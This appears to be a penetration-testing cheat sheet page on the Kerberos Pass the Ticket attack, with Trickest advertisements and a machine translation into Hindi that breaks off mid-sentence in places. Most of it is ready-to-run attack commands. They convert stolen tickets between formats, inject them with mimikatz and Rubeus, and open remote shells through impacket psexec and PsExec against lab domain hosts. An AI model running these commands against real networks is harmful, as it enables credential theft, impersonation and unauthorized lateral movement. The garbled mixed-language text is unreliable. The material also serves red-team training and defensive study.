Pass the Ticket

Use Trickest to easily build and automate workflows powered by the world's most advanced community tools. Get Access Today:

Pass The Ticket (PTT)

In the Pass The Ticket (PTT) attack method, attackers एक उपयोगकर्ता का प्रमाणीकरण टिकट चुराते हैं instead of their password or hash values. This stolen ticket is then used to उपयोगकर्ता का अनुकरण करें, gaining unauthorized access to resources and services within a network.

Read:

• Harvesting tickets from Windows

• Harvesting tickets from Linux

Swaping Linux and Windows tickets between platforms

The ticket_converter tool converts ticket formats using just the ticket itself and an output file.

python ticket_converter.py velociraptor.ccache velociraptor.kirbi
Converting ccache => kirbi

python ticket_converter.py velociraptor.kirbi velociraptor.ccache
Converting kirbi => ccache

Windows में Kekeo का उपयोग किया जा सकता है।

पास द टिकट अटैक

export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK
python psexec.py jurassic.park/trex@labwws02.jurassic.park -k -no-pass

#Load the ticket in memory using mimikatz or Rubeus
mimikatz.exe "kerberos::ptt [0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi"
.\Rubeus.exe ptt /ticket:[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi
klist #List tickets in cache to cehck that mimikatz has loaded the ticket
.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd

संदर्भ

• https://www.tarlogic.com/blog/how-to-attack-kerberos/

Trickest का उपयोग करें ताकि आप आसानी से वर्कफ़्लो बना सकें और स्वचालित कर सकें जो दुनिया के सबसे उन्नत सामुदायिक उपकरणों द्वारा संचालित हैं। आज ही एक्सेस प्राप्त करें: